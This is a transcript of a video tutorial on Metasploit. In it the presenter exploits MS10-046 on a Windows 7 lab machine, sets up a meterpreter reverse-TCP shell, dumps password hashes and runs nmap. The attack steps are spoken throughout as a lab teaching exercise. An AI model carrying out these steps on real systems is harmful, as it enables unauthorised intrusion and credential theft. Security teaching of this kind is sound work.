Hello everyone, welcome back to ethical hacking video series. In this series we will look at Metasploit, a hacking tool. So we will go through with the basic commands and advanced techniques and tricks and all, and like how to hack computers and the secure machines and websites and all. Alright, so let's get started here from here. So it's our lab setup. In this lab setup we have one Windows 7 virtual machine vulnerable to MS10-046, alright, which is Microsoft Windows browser vulnerabilities. And the second is a like normal physical machine with installed the Metasploit, and it will act as an attacker machine. Alright, so let's talk little about the technical term which we're gonna use in this video series. So first is a vulnerabilities. Vulnerability is a flaw in a system or a weakness or a bugs in application that allow attacker or a hacker to break into a system. Alright, and exploit is a piece of code that allows attacker to take advantage of a vulnerable or a weak machine. Alright, next is payload. Payload a actual code which runs after exploit succeeds. So this is the best example. If you can see, we have the facility here or a place here which is not secure in the open area, and that's called vulnerabilities. They don't have security on. Once you launch the exploit, it will blow up your gate, which allows you to get into the same facilities called payload. Alright, so let's start with the Windows machine. This is my Windows machine and Windows 7, and this is I have to launch the command. This is my physical machine, will act as an attacker. Alright, so let's fire up with the fire up with the Metasploit tool by typing msf console, hit enter. It will load in just few seconds. Alright, so we are in this Metasploit. As you can see here, they have tons of exploits, around 1500 exploits, and auxiliaries, almost thousands of auxiliaries, and 250 ports post exploits we can say, and 438 payloads, encoders. So don't worry, we just talk about the exploit, but in our separate video we are having some discussion on auxiliaries and ports and payloads. Alright, so let's get started. As we already means if you can find out on internet, means if you can check on internet the common vulnerabilities in Windows 7, you will get tons of. Alright, so this is one of them. I have taken MS10-046. So now we have to find out that particular vulnerability, the exploit. This is the exploit. Let me copy it. Alright, this exploit we have to find out from the 1539 exploits, which is very difficult. So let's use the search command and type ms10-046 is your exploit name and hit enter. Alright, so bingo. So we have the exploit list here, which is related to this as well, but we are here to pick this one, exploit Windows browser, this one. So let's copy it, and we have to use this exploit. So you just have to type use and paste it here. Alright, and hit enter. Alright, so exploit has been selected. Just look at the basic info of this exploit, what it says, by typing info and hit enter. So let me go up. Alright, so this is the basic info of the exploit, starting from here, the name, Microsoft Windows Shell, link code, exploit browser, and blah blah, platform on Windows. Alright, the Metasploit license free BSD, and the rank is excellent, and which is disclosed in 2010, very old vulnerabilities. Alright, and these are the basic options here. It says SV host. If you can see here, name, current setting, required, and description. Alright, so wherever it says required, yes, it is mandatory, you have to fill these options here. Whenever it says no, this is just an optional. Alright, so let me make this make it easy. Let me remove this crap, and we'll bring the specific window by typing show option and hit enter. Let me type it again, show option, and hit enter. Now you can see the requirement of this exploit is you have to fill this one which says yes. Alright, so for that we just have to check the our current IP address. You can type here in the same window or just open it, the new one. Alright, so if config, so this is my IP address. Alright, let's copy and go back to our Metasploit window. Let's type set and srv host, which says here srv host, and space, type your local IP address, which is 192.168. What was that? Alright, 43.244. 43.244. Alright, 43.244, which is your local IP address, and hit enter. Okay, perfect. Let's check again. Let's cross verify, show option, and hit enter. As you can see, the IP has been selected. Alright, so as we discussed in our presentation, the exploit as we have selected here. Alright, so a piece of code that allows attacker to take advantage of vulnerable machine. Alright, so once your exploit runs and succeeded, payload runs next. Alright, so your exploit, once it succeeds, payload will run next. Alright, so the concept is clear now, and let me exit from here. Alright, go back to our Metasploit. So this is the exploit. I think this window is not clear. Let me minimize my presentation first. Alright, I hope it's clear now. Minimize this machine as well. Alright, even I can change my background as well, the transparency. Alright, okay, perfect. Now so we have selected exploit. Now we have to select the payload which allow us to get into the system and help us to get the full access of the victim machine. So let's type set payload, and in this case I'm gonna use Windows Meterpreter reverse TCP. Hit enter. Again we have to check the requirement of this specific payload. So you can say show option, hit enter. So this is the payload requirement. Here is the one existing exit function process, let it be as it is, and it says L host. The required is all yes, which is mandatory, so one is blank only, which is L host. So L host should be your local host. Alright, so let's type set L host and your IP address, which is 192.168.43.244. Alright, so let's cross verify again by typing show option. Okay, so we have filled the all requirements, which is here. Whenever you type exploit, this exploit will run. Alright, if it finds the vulnerabilities, it will succeed, it will execute it and allow your payload to run next. Alright, and once your payload run, it will connect back to this IP address with this port. All right, so let's check the client victim machine first, the IP address of the victim machine by typing IP config. All right, so it's 43.11. so let me take the remote desktop of my window machine so we can have the two windows at a time. All right, so I'm minimizing this one and just type RU IT support dollar. This is my IP address. All right, so we are in. Type the IP of your victim machine. All right, so we have access of victim machine as well. Okay, let me set on the always on top. Fine, so we can have the both window on the same screen. All right, so now we are good to go. The exploit has been set and the payload is also attached here. Let's type just exploit and hit enter. All right, now wait for some time. Here it says say in vulnerability client 2. All right, this will gonna happen. Or let your victim access your URL. This is your IP address, which called URL in this case, slash forward slash type anything dot link. All right, so let's open the Internet Explorer and 192.168.43.244. all right, slash let's say anything h dot link as it says here and hit enter. All right, the IP is wrong here. It should be 43, not 42. All right, 43 and hit enter. So something is happening on the attacker machine. All right, so they are sending exploits and all. So if you can see here, the one session is Metasploit session is has opened. All right, so I think there is some problem with my remote. Let me close the remote session again and close the session and reopen it again. All right, so let's check what's going on exactly, why the machine is hanged. Meantime, let's go back to our attacker machine and see the session is been open. All right, that says machine is hacked. And let me close that first, this window. All right, it's been closed and let's minimize. Okay, so let's check the open session here by typing sessions s. All right, so here you can see active sessions. This is the active session. It says ID number 1 and type Metasploit, your information, victim IP address, which says connection to this local machine on this port through this IP and this port. All right, so let's interact with the session by typing session -I, or you can say H for help. You can see there are the tons of options you can use here. I'm gonna use I to interact with my session ID called 1. Type 1 and hit enter. All right, so you can check the IP config of your target machine. IP config. Okay, this is your config. Let me take the remote again. Okay, all right, so and personalize desktop. Okay, set on top. Perfect. All right, now we are in. So let's check here on the client side the port and all by typing net state -n and hit enter. You can see here the local IP, which is your IP. It's connected to this port as we have already checked here. This is the port 49164, which is connected to foreign address, which is attacker machine IP, and the port is 444. All right, so here we can do a bunch of things here. Like we can run the few basics command to check the attacker, to check the victims and all, means the victim's detail. All right, so let's type sysinfo and hit enter. It will give you the computer information, Windows 7 and Windows 8, EN English, and lots of things. If you can type get UID, so that says you logged in as a support dollar account. All right, and check the get PID, that says your current process ID running on the victim machine of process which you run on the victim side. All right, so this process 2696, let's type the process and check what processes are running on the victim side. All right, okay, so it's 26, what was our process ID? It get process ID is 2696, so it should be here 2696, the process which should be bind with the Internet Explorer or DLL. If you can see here 2696 is the run dll32.exe. all right, now if you want to check the user, it's ideal or it's browsing doing something, means working on it, so it's like it's a good idea to check whether, means if you're working on the hacked machine, so user will notice something phishing is going on. All right, so let's just make out what exactly user doing on the, means whether it is active interacting with the client, interacting with the machine. All right, so it says the user is active, is ideal for 1 minute 17 seconds. all right, so it's just ideal. So the next, if you can type question mark and hit enter, you can get the bunch of options from here. all right, which says hash dump, timestamp. We are having a separate video on this trick, timestamp, and recording mic, webcam. Let's go up and check the other options. There are a lot here you can try. all right, so let's pick some of them by typing hash dump and hit enter. Here it will give you the password of your victim machine in the hash format, which is starting from here to here. all right, this is the hash dump, and IP we have already checked. We can check the route, the gateways and all which is added, and you can even check the running or installed application on the victim machine. Just type get and app list. all right, hit enter. It will give you the list of installed applications. So as of now we just installed the Google Chrome. As you can see here, the Google Chrome has been installed. all right, and there are the lots of options here. The actually game begins with the scanning tools. all right, this is a vulnerability is very famous on the net. I have checked, so I don't have to run the scanning and all to know the client, means I'm already aware I'm attacking to Windows machine. But in your case or other cases, if you are not well aware about with your the target, if you want to attack on it, so first you have to make out the operating systems, means target is running on which operating system, the operating system platform, the open ports, and the ports numbers or vulnerable services. There are lots of tool is available out there, which gives you the clear picture of the vulnerabilities in the victim machine. all right, so let's check the nmap and just type h, let's say for help. There are the lots of options here. We will be gonna use few of them as per our requirement. I just wanted to know the open ports of the victim machine and the operating system. So here are the where we can see the ports here, options for port. Alright, so -O for OS detection, and this is the open ports to determine the services and the version. Alright, so let's type nmap SV operating system and type the target computer IP address, which is 43.11. Actually, game starts from here. If you're not very well aware with your target, it's good to know first before you launch the attack. Alright, so what we have just exploited, that is a common vulnerability. It's normal vulnerability in web browser. Alright, it will take little time to give you the clear picture, to give you the open ports and platform. So at least you will get a rough idea what exactly the target is, means is running on which applications and what are the ports and all. Or else let me pause this video and we'll resume as soon as we get the results here. Alright, so let me pause it now. Alright, so results are here. These are the open ports. In live and production environment, you might use different tools which is available with the different results, which gives you the exploit name as well. So this port or service is vulnerable with this exploit, which is disclosed on this date, and this is the name, which will be easy to search in the Metasploit. Alright, so these are the ports open on the target machine: Windows RPC port and terminal services. Alright, and the MAC address, the general device, and the running OS is just guessing is Windows, is actually Windows platform, but 8 or 7, so it's not a big deal. Alright, so here we are done. We have attack on the Windows 7 machine and we have the full access now. Alright, so I hope you enjoyed this video, and alright, we are done here. Like and subscribe for part 2. In part 2 we will be having the advanced commands or few more commands, so we will know the basics of the Metasploit. Alright, thanks for your time.